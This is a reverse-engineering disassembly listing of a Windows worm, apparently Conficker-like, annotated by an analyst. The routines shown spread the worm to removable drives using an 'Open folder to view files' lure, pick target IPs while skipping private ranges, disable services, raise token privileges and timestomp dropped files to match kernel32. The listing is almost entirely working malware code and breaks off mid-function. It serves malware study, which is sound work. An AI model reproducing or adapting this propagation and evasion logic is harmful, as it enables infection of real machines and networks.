loc_9AC1D8: ; CODE XREF: sub_9AC151+28�j
; sub_9AC151+2E�j ...
shr [ebp+var_C], 1
inc [ebp+var_1]
cmp [ebp+var_1], 1Ah
jl short loc_9AC175
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_9AC151 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_attach_to_explorer proc near ; CODE XREF: sub_main+190�p
CommandLine = byte ptr -228h
var_125 = byte ptr -125h
Str = byte ptr -124h
var_21 = byte ptr -21h
Dst = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 228h
push ebx
push esi
push edi
xor ebx, ebx
push ebx ; Data
push offset aCheckedvalue ; "CheckedValue"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call sub_9AD0F4
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
add esp, 1Ch
push 1 ; bSet
push 40021h ; dwMask
lea eax, [ebp+Dst]
push eax ; lpss
call ds:SHGetSetSettings
mov esi, 104h
push esi ; Count
lea eax, [ebp+Str]
push offset FileName ; "c:\\c.dll"
push eax ; Dest
call ds:strncpy
add esp, 0Ch
mov [ebp+var_21], bl
xor edi, edi
loc_9AC250: ; CODE XREF: sub_attach_to_explorer+7E�j
lea eax, [ebp+Str]
push 5Ch ; Ch
push eax ; Str
call ds:strrchr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9AC26D
inc edi
cmp edi, 3
mov [eax], bl
jl short loc_9AC250
loc_9AC26D: ; CODE XREF: sub_attach_to_explorer+76�j
cmp [ebp+Str], bl
jnz short loc_9AC288
lea eax, [ebp+Str]
push offset a__0 ; "."
push eax
call _mbscpy
pop ecx
pop ecx
loc_9AC288: ; CODE XREF: sub_attach_to_explorer+86�j
lea eax, [ebp+Str]
push eax
push offset aExplorerS ; "explorer %s"
lea eax, [ebp+CommandLine]
push esi ; Count
push eax ; Dest
call ds:_snprintf
lea eax, [ebp+CommandLine]
push 1 ; int
push eax ; lpCommandLine
mov [ebp+var_125], bl
call sub_call_create_process
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_attach_to_explorer endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_infect_remote_and_removable_drives proc near ; CODE XREF: StartAddress:loc_9A793B�p
ThreadId = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push offset aShell32_dll ; "shell32.dll"
call ds:GetModuleHandleA
xor ebx, ebx
cmp eax, ebx
mov esi, offset Buffer
jz short loc_9AC2FC
push 100h ; cchBufferMax
push esi ; lpBuffer
push 4302h ; uID
push eax ; hInstance
call ds:LoadStringA
test eax, eax
jz short loc_9AC2FC
push esi ; Str
call strlen
test eax, eax
pop ecx
jnz short loc_9AC309
loc_9AC2FC: ; CODE XREF: sub_infect_remote_and_removable_drives+1B�j
; sub_infect_remote_and_removable_drives+31�j
push offset aOpenFolderToVi ; "Open folder to view files"
push esi
call _mbscpy
pop ecx
pop ecx
loc_9AC309: ; CODE XREF: sub_infect_remote_and_removable_drives+3C�j
mov esi, ds:CreateThread
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9AC151 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
mov edi, ds:CloseHandle
push eax ; hObject
call edi ; CloseHandle
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9AC09E ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
push eax ; hObject
call edi ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_infect_remote_and_removable_drives endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_get_seed_from_volume_info proc near ; CODE XREF: sub_9AA064:loc_9AA0B2�p
; sub_9AFC25+24�p
RootPathName = byte ptr -108h
var_105 = byte ptr -105h
VolumeSerialNumber= dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h ; uSize
lea eax, [ebp+RootPathName]
push eax ; lpBuffer
mov [ebp+VolumeSerialNumber], 12345678h
call ds:GetSystemDirectoryA
xor eax, eax
push eax ; nFileSystemNameSize
push eax ; lpFileSystemNameBuffer
push eax ; lpFileSystemFlags
push eax ; lpMaximumComponentLength
lea ecx, [ebp+VolumeSerialNumber]
push ecx ; lpVolumeSerialNumber
push eax ; nVolumeNameSize
push eax ; lpVolumeNameBuffer
mov [ebp+var_105], al
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
call ds:GetVolumeInformationA
mov eax, [ebp+VolumeSerialNumber]
leave
retn
sub_get_seed_from_volume_info endp
; =============== S U B R O U T I N E =======================================
sub_check_value_of_hostlong proc near ; CODE XREF: sub_9A9DA6+7�p
; sub_9AD6D4+D6�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor eax, eax
mov edx, ecx
and edx, 0FFFFh
inc eax
cmp edx, 0A8C0h
jz short loc_9AC3AE
cmp cl, 0Ah
jz short loc_9AC3AE
and ecx, 0F0FFh
cmp ecx, 10ACh
jnz short locret_9AC3B0
loc_9AC3AE: ; CODE XREF: sub_check_value_of_hostlong+15�j
; sub_check_value_of_hostlong+1A�j
xor eax, eax
locret_9AC3B0: ; CODE XREF: sub_check_value_of_hostlong+28�j
retn
sub_check_value_of_hostlong endp
; =============== S U B R O U T I N E =======================================
sub_check_for_IP_pattern proc near ; CODE XREF: sub_9AC416+A4�p
; sub_9AD6D4+C9�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
and ecx, 0FFh
xor eax, eax
cmp ecx, 7Fh
jz short loc_9AC414
test ecx, ecx
jz short loc_9AC414
mov ecx, esi
and ecx, 0FFFFh
cmp ecx, 0FEA9h
jz short loc_9AC414
mov ecx, esi
and ecx, 0FEFFh
cmp ecx, 12C6h
jz short loc_9AC414
mov ecx, esi
and ecx, 0FFFFFFh
cmp ecx, 0FFFFFDh
jz short loc_9AC414
mov ecx, esi
mov edx, 0F0h
and ecx, edx
cmp ecx, 0E0h
jz short loc_9AC414
cmp ecx, edx
jz short loc_9AC414
cmp esi, 0FFFFFFFFh
jz short loc_9AC414
inc eax
loc_9AC414: ; CODE XREF: sub_check_for_IP_pattern+12�j
; sub_check_for_IP_pattern+16�j ...
pop esi
retn
sub_check_for_IP_pattern endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC416(void *Dst,int)
sub_9AC416 proc near ; CODE XREF: sub_outbound_propagation+62�p
; sub_outbound_propagation+3AC�p
vOutBuffer = byte ptr -4C14h
s = dword ptr -14h
var_10 = dword ptr -10h
cbBytesReturned = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4C14h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+Dst]
push edi
mov edi, [ebp+arg_4]
lea eax, [edi+edi*2]
shl eax, 2
push eax ; Size
xor ebx, ebx
push ebx ; Val
push esi ; Dst
mov [ebp+var_4], ebx
call memset
add esp, 0Ch
push ebx ; protocol
push 1 ; type
push 2 ; af
call ds:socket
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jz loc_9AC503
push ebx ; lpCompletionRoutine
push ebx ; lpOverlapped
lea ecx, [ebp+cbBytesReturned]
push ecx ; lpcbBytesReturned
push 4C00h ; cbOutBuffer
lea ecx, [ebp+vOutBuffer]
push ecx ; lpvOutBuffer
push ebx ; cbInBuffer
push ebx ; lpvInBuffer
push 4004747Fh ; dwIoControlCode
push eax ; s
call ds:WSAIoctl
test eax, eax
jnz short loc_9AC4FA
mov eax, [ebp+cbBytesReturned]
push 4Ch
xor edx, edx
pop ecx
div ecx
mov [ebp+var_8], ebx
cmp eax, ebx
mov [ebp+cbBytesReturned], eax
jbe short loc_9AC4FA
lea ebx, [ebp+vOutBuffer]
add esi, 8
jmp short loc_9AC49F
; ---------------------------------------------------------------------------
loc_9AC49C: ; CODE XREF: sub_9AC416+E2�j
mov edi, [ebp+arg_4]
loc_9AC49F: ; CODE XREF: sub_9AC416+84�j
cmp [ebp+var_4], edi
jnb short loc_9AC4FA
mov eax, [ebx+8]
mov edi, [ebx+38h]
and edi, eax
mov [ebp+var_10], eax
mov eax, [ebx]
test al, 1
jz short loc_9AC4EC
test al, 4
jnz short loc_9AC4EC
push edi
call sub_check_for_IP_pattern
test eax, eax
pop ecx
jz short loc_9AC4EC
cmp [ebp+var_10], 0
jz short loc_9AC4EC
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_9AC4EC
push dword ptr [ebx+38h] ; hostlong
call ds:__imp_htonl
mov ecx, [ebp+var_10]
inc [ebp+var_4]
not eax
mov [esi-8], ecx
mov [esi-4], edi
mov [esi], eax
add esi, 0Ch
loc_9AC4EC: ; CODE XREF: sub_9AC416+9D�j
; sub_9AC416+A1�j ...
inc [ebp+var_8]
mov eax, [ebp+var_8]
add ebx, 4Ch
cmp eax, [ebp+cbBytesReturned]
jb short loc_9AC49C
loc_9AC4FA: ; CODE XREF: sub_9AC416+65�j
; sub_9AC416+79�j ...
push [ebp+s] ; s
call ds:closesocket
loc_9AC503: ; CODE XREF: sub_9AC416+3D�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9AC416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_call_srand_with_seed_from_thread_id proc near ; CODE XREF: sub_run_dll+36�p
; StartAddress+15�p ...
PerformanceCount= LARGE_INTEGER ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call ds:GetCurrentThreadId
mov esi, eax
call ds:GetCurrentProcessId
mov edi, eax
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call ds:QueryPerformanceCounter
test eax, eax
jnz short loc_9AC53A
and dword ptr [ebp+PerformanceCount+4], eax
mov dword ptr [ebp+PerformanceCount], 4362AEB0h
loc_9AC53A: ; CODE XREF: sub_call_srand_with_seed_from_thread_id+23�j
call ds:GetTickCount
xor eax, dword ptr [ebp+PerformanceCount]
xor eax, edi
xor eax, esi
push eax ; Seed
call ds:srand
pop ecx
pop edi
pop esi
leave
retn
sub_call_srand_with_seed_from_thread_id endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC553(LPCSTR lpServiceName)
sub_9AC553 proc near ; CODE XREF: StartAddress+160�p
; StartAddress+16C�p
hSCObject = dword ptr -20h
ServiceStatus = _SERVICE_STATUS ptr -1Ch
lpServiceName = dword ptr 4
sub esp, 20h
push ebp
push edi
push 0F003Fh ; dwDesiredAccess
xor edi, edi
push edi ; lpDatabaseName
push edi ; lpMachineName
xor ebp, ebp
call ds:OpenSCManagerA
cmp eax, edi
mov [esp+28h+hSCObject], eax
jz short loc_9AC5CF
push ebx
push esi
push 20022h ; dwDesiredAccess
push [esp+34h+lpServiceName] ; lpServiceName
push eax ; hSCManager
call ds:OpenServiceA
mov ebx, ds:CloseServiceHandle
mov esi, eax
cmp esi, edi
jz short loc_9AC5C7
lea eax, [esp+30h+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push esi ; hService
call ds:ControlService
mov ebp, eax
cmp ebp, edi
jz short loc_9AC5AE
push 1388h ; dwMilliseconds
call ds:Sleep
loc_9AC5AE: ; CODE XREF: sub_9AC553+4E�j
push edi ; lpDisplayName
push edi ; lpPassword
push edi ; lpServiceStartName
push edi ; lpDependencies
push edi ; lpdwTagId
push edi ; lpLoadOrderGroup
push edi ; lpBinaryPathName
push 0FFFFFFFFh ; dwErrorControl
push 4 ; dwStartType
push 0FFFFFFFFh ; dwServiceType
push esi ; hService
call ds:ChangeServiceConfigA
push esi ; hSCObject
or ebp, eax
call ebx ; CloseServiceHandle
loc_9AC5C7: ; CODE XREF: sub_9AC553+3A�j
push [esp+30h+hSCObject] ; hSCObject
call ebx ; CloseServiceHandle
pop esi
pop ebx
loc_9AC5CF: ; CODE XREF: sub_9AC553+1C�j
pop edi
mov eax, ebp
pop ebp
add esp, 20h
retn
sub_9AC553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC5D7(LPCSTR lpName,int)
sub_9AC5D7 proc near ; CODE XREF: sub_9A7170+93�p
; sub_main+4F�p
NewState = _TOKEN_PRIVILEGES ptr -14h
hObject = dword ptr -4
lpName = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push edi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 28h ; DesiredAccess
xor edi, edi
call ds:GetCurrentProcess
push eax ; ProcessHandle
call ds:OpenProcessToken
test eax, eax
jz short loc_9AC63D
mov eax, [ebp+arg_4]
neg eax
sbb eax, eax
and eax, 2
mov [ebp+NewState.Privileges.Attributes], eax
lea eax, [ebp+NewState.Privileges]
push eax ; lpLuid
push [ebp+lpName] ; lpName
mov [ebp+NewState.PrivilegeCount], 1
push edi ; lpSystemName
call ds:LookupPrivilegeValueA
test eax, eax
jz short loc_9AC634
push edi ; ReturnLength
push edi ; PreviousState
push 10h ; BufferLength
lea eax, [ebp+NewState]
push eax ; NewState
push edi ; DisableAllPrivileges
push [ebp+hObject] ; TokenHandle
call ds:AdjustTokenPrivileges
test eax, eax
jz short loc_9AC634
inc edi
loc_9AC634: ; CODE XREF: sub_9AC5D7+44�j
; sub_9AC5D7+5A�j
push [ebp+hObject] ; hObject
call ds:CloseHandle
loc_9AC63D: ; CODE XREF: sub_9AC5D7+1E�j
mov eax, edi
pop edi
leave
retn
sub_9AC5D7 endp
; =============== S U B R O U T I N E =======================================
sub_make_array_of_alphabet proc near ; CODE XREF: sub_run_dll+31�p
; sub_main+AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9AC66A
loc_9AC653: ; CODE XREF: sub_make_array_of_alphabet+26�j
call ds:rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_9AC653
loc_9AC66A: ; CODE XREF: sub_make_array_of_alphabet+F�j
mov byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_make_array_of_alphabet endp
; =============== S U B R O U T I N E =======================================
sub_9AC672 proc near ; CODE XREF: sub_run_dll_remote_host+81�p
; sub_run_dll_remote_host+BA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9AC69B
loc_9AC683: ; CODE XREF: sub_9AC672+27�j
call ds:rand
push 1Ah
cdq
pop ecx
idiv ecx
add edx, 61h
mov [ebx+esi*2], dx
inc esi
cmp esi, edi
jl short loc_9AC683
loc_9AC69B: ; CODE XREF: sub_9AC672+F�j
and word ptr [ebx+edi*2], 0
pop edi
pop esi
pop ebx
retn
sub_9AC672 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_set_file_time_to_kernel32_time(LPCSTR lpFileName)
sub_set_file_time_to_kernel32_time proc near ; CODE XREF: sub_run_dll+FE�p
; sub_run_dll_remote_host+200�p ...
FileName = byte ptr -11Ch
LastWriteTime = _FILETIME ptr -18h
CreationTime = _FILETIME ptr -10h
LastAccessTime = _FILETIME ptr -8
lpFileName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
push 104h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
push offset aKernel32_dll ; "kernel32.dll"
call ds:GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA
mov esi, ds:CreateFileA
xor ebx, ebx
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call esi ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AC73C
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push edi ; hFile
call ds:GetFileTime
push edi ; hObject
mov edi, ds:CloseHandle
call edi ; CloseHandle
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9AC73C
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push esi ; hFile
call ds:SetFileTime
push esi ; hObject
call edi ; CloseHandle
loc_9AC73C: ; CODE XREF: sub_set_file_time_to_kernel32_time+4C�j
; sub_set_file_time_to_kernel32_time+80�j
pop edi
pop esi
pop ebx
leave
retn
sub_set_file_time_to_kernel32_time endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC741(SIZE_T dwBytes)
sub_9AC741 proc near ; CODE XREF: sub_9AA8E9+96�p
dwBytes = dword ptr 4
push [esp+dwBytes] ; dwBytes
push 9 ; dwFlags
call ds:GetProcessHeap
push eax ; hHeap
call ds:HeapAlloc
retn
sub_9AC741 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC755(LPVOID lpMem)
sub_9AC755 proc near ; CODE XREF: sub_9AA8E9+271�p
lpMem = dword ptr 4
push [esp+lpMem] ; lpMem
push 0 ; dwFlags
call ds:GetProcessHeap
push eax ; hHeap
call ds:HeapFree
retn
sub_9AC755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC769(int,LPCSTR lpFileName)
sub_9AC769 proc near ; CODE XREF: sub_run_dll+A4�p
; StartAddress+B4�p ...
var_C = dword ptr -0Ch
hObject = dword ptr -8
NumberOfBytesRead= dword ptr -4
arg_0 = dword ptr 8
lpFileName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_C], esi
call ds:CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz short loc_9AC7EA
push ebx
push edi
push esi ; lpFileSizeHigh
push eax ; hFile
call ds:GetFileSize
mov edi, eax
push edi ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov ebx, eax
cmp ebx, esi
jz short loc_9AC7DF
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nNumberOfBytesToRead
push ebx ; lpBuffer
push [ebp+hObject] ; hFile
mov [ebp+NumberOfBytesRead], esi
call ds:ReadFile
test eax, eax
jz short loc_9AC7D8
cmp [ebp+NumberOfBytesRead], edi
jnz short loc_9AC7D8
cmp [ebp+NumberOfBytesRead], esi
jz short loc_9AC7D8
mov eax, [ebp+arg_0]
mov [ebp+var_C], ebx
mov [eax], edi
jmp short loc_9AC7DF
; ---------------------------------------------------------------------------
loc_9AC7D8: ; CODE XREF: sub_9AC769+59�j
; sub_9AC769+5E�j ...
push ebx ; hMem
call ds:GlobalFree
loc_9AC7DF: ; CODE XREF: sub_9AC769+42�j
; sub_9AC769+6D�j
push [ebp+hObject] ; hObject
call ds:CloseHandle
pop edi
pop ebx
loc_9AC7EA: ; CODE XREF: sub_9AC769+27�j
mov eax, [ebp+var_C]
pop esi
leave
retn
sub_9AC769 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_create_file_and_set_tile_to_kernel32_time(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPCSTR lpFileName)
sub_create_file_and_set_tile_to_kernel32_time proc near ; CODE XREF: sub_run_dll+C6�p
; sub_9ABA9B+B6�p ...
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpFileName = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_4], esi
call ds:CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AC85D
push ebx
mov ebx, [ebp+nNumberOfBytesToWrite]
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push ebx ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
mov [ebp+NumberOfBytesWritten], esi
push edi ; hFile
call ds:WriteFile
test eax, eax
jz short loc_9AC83F
cmp [ebp+NumberOfBytesWritten], ebx
jnz short loc_9AC83F
mov [ebp+var_4], 1
loc_9AC83F: ; CODE XREF: sub_create_file_and_set_tile_to_kernel32_time+41�j
; sub_create_file_and_set_tile_to_kernel32_time+46�j
push edi ; hObject
call ds:CloseHandle
cmp [ebp+var_4], esi
pop ebx
push [ebp+lpFileName] ; lpFileName
jz short loc_9AC857
call sub_set_file_time_to_kernel32_time
pop ecx
jmp short loc_9AC85D
; ---------------------------------------------------------------------------
loc_9AC857: ; CODE XREF: sub_create_file_and_set_tile_to_kernel32_time+5D�j
call ds:DeleteFileA
loc_9AC85D: ; CODE XREF: sub_create_file_and_set_tile_to_kernel32_time+26�j
; sub_create_file_and_set_tile_to_kernel32_time+65�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_create_file_and_set_tile_to_kernel32_time endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC864(SOCKET s,u_long len,int)
sub_9AC864 proc near ; CODE XREF: sub_9AF52D+7B�p
; sub_9AF52D+C4�p ...
readfds = fd_set ptr -210h
exceptfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
len = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 210h
mov ecx, [ebp+arg_8]
push ebx
push esi
mov esi, [ebp+len]
push edi
mov edi, [ebp+s]
mov [ebp+timeout.tv_sec], ecx
lea ecx, [ebp+timeout]
push ecx ; timeout
xor eax, eax
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
push eax ; writefds
lea ecx, [ebp+readfds]
xor ebx, ebx
push ecx ; readfds
inc ebx
push eax ; nfds
mov [esi], eax
mov [ebp+readfds.fd_array], edi
mov [ebp+readfds.fd_count], ebx
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], ebx
mov [ebp+timeout.tv_usec], eax
call ds:select
cmp eax, ebx
mov [ebp+len], eax
jl short loc_9AC91F
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AC91F
lea eax, [ebp+len]
push eax ; argp
push 4004667Fh ; cmd
push edi ; s
call ds:ioctlsocket
cmp eax, 0FFFFFFFFh
jz short loc_9AC92A
push [ebp+len] ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9AC91B
push 0 ; flags
push [ebp+len] ; len
push ebx ; buf
push edi ; s
call ds:recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_9AC90D
and dword ptr [esi], 0
loc_9AC90D: ; CODE XREF: sub_9AC864+A4�j
cmp dword ptr [esi], 0
jnz short loc_9AC91B
push ebx ; hMem
call ds:GlobalFree
xor ebx, ebx
loc_9AC91B: ; CODE XREF: sub_9AC864+90�j
; sub_9AC864+AC�j
mov eax, ebx
jmp short loc_9AC92C
; ---------------------------------------------------------------------------
loc_9AC91F: ; CODE XREF: sub_9AC864+59�j
; sub_9AC864+6A�j
push 274Ch ; iError
call ds:WSASetLastError
loc_9AC92A: ; CODE XREF: sub_9AC864+7F�j
xor eax, eax
loc_9AC92C: ; CODE XREF: sub_9AC864+B9�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AC864 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC931(SOCKET s,int,int,int)
sub_9AC931 proc near ; CODE XREF: sub_9AF52D+63�p
; sub_9AF52D+AD�p ...
writefds = fd_set ptr -210h
exceptfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9AC9BC
mov esi, [ebp+s]
xor ebx, ebx
inc ebx
loc_9AC94A: ; CODE XREF: sub_9AC931+89�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+timeout]
push ecx ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
lea ecx, [ebp+writefds]
mov [ebp+timeout.tv_sec], eax
xor eax, eax
push ecx ; writefds
push eax ; readfds
push eax ; nfds
mov [ebp+writefds.fd_array], esi
mov [ebp+writefds.fd_count], ebx
mov [ebp+exceptfds.fd_array], esi
mov [ebp+exceptfds.fd_count], ebx
mov [ebp+timeout.tv_usec], eax
call ds:select
cmp eax, ebx
jl short loc_9AC9C8
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push esi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AC9C8
push eax ; flags
mov eax, [ebp+arg_8]
sub eax, edi
push eax ; len
mov eax, [ebp+arg_4]
add eax, edi
push eax ; buf
push esi ; s
call ds:send
cmp eax, 0FFFFFFFFh
jz short loc_9AC9C3
add edi, eax
cmp edi, [ebp+arg_8]
jl short loc_9AC94A
loc_9AC9BC: ; CODE XREF: sub_9AC931+11�j
mov eax, edi
loc_9AC9BE: ; CODE XREF: sub_9AC931+95�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9AC9C3: ; CODE XREF: sub_9AC931+82�j
; sub_9AC931+A2�j
or eax, 0FFFFFFFFh
jmp short loc_9AC9BE
; ---------------------------------------------------------------------------
loc_9AC9C8: ; CODE XREF: sub_9AC931+58�j
; sub_9AC931+69�j
push 274Ch ; iError
call ds:WSASetLastError
jmp short loc_9AC9C3
sub_9AC931 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC9D5(SOCKET fd,int,u_short hostshort,int)
sub_9AC9D5 proc near ; CODE XREF: sub_9AF52D+40�p
exceptfds = fd_set ptr -228h
writefds = fd_set ptr -124h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
timeout = timeval ptr -10h
var_8 = dword ptr -8
argp = dword ptr -4
fd = dword ptr 8
arg_4 = dword ptr 0Ch
hostshort = word ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_8], 0
push ebx
push esi
push edi
push 10h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push 0 ; Val
inc esi
push eax ; Dst
mov [ebp+argp], esi
call memset
mov eax, [ebp+arg_4]
add esp, 0Ch
push dword ptr [ebp+hostshort] ; hostshort
mov [ebp+Dst], 2
mov [ebp+var_1C], eax
call ds:htons
mov edi, [ebp+fd]
mov ebx, ds:ioctlsocket
mov [ebp+var_1E], ax
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ebx ; ioctlsocket
push 10h ; namelen
lea eax, [ebp+Dst]
push eax ; name
push edi ; s
call ds:connect
cmp eax, 0FFFFFFFFh
jnz short loc_9ACA48
call ds:WSAGetLastError
cmp eax, 2733h
jnz short loc_9ACAB9
loc_9ACA48: ; CODE XREF: sub_9AC9D5+64�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+timeout]
push ecx ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
lea ecx, [ebp+writefds]
mov [ebp+timeout.tv_sec], eax
xor eax, eax
push ecx ; writefds
push eax ; readfds
push eax ; nfds
mov [ebp+writefds.fd_array], edi
mov [ebp+writefds.fd_count], esi
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], esi
mov [ebp+timeout.tv_usec], eax
call ds:select
mov [ebp+arg_4], eax
lea eax, [ebp+var_8]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ebx ; ioctlsocket
cmp [ebp+arg_4], esi
jl short loc_9ACAAE
lea eax, [ebp+writefds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jz short loc_9ACAAE
xor eax, eax
jmp short loc_9ACABC
; ---------------------------------------------------------------------------
loc_9ACAAE: ; CODE XREF: sub_9AC9D5+C2�j
; sub_9AC9D5+D3�j
push 274Ch ; iError
call ds:WSASetLastError
loc_9ACAB9: ; CODE XREF: sub_9AC9D5+71�j
or eax, 0FFFFFFFFh
